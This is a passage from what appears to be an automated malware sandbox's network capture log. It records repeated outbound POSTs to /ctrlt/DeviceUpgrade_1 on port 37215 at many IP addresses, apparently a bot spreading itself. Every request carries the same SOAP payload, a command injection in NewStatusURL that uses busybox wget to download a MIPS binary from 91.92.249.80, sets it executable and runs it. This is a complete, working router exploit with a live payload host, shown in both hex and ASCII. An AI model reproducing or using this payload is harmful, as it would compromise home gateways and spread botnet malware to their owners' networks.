                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1665192.168.2.235448841.70.16.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513309002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1666192.168.2.2360984197.234.9.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513318062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1667192.168.2.2360626197.198.133.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513458014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1668192.168.2.2352270157.49.56.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513714075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1669192.168.2.233741241.164.209.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513715029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1670192.168.2.2357534157.74.222.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513736963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1671192.168.2.234407044.143.98.11837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513895988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1672192.168.2.2354904197.12.114.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.514180899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1673192.168.2.2356896197.212.79.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.514204025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1674192.168.2.2346446197.187.70.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.514234066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
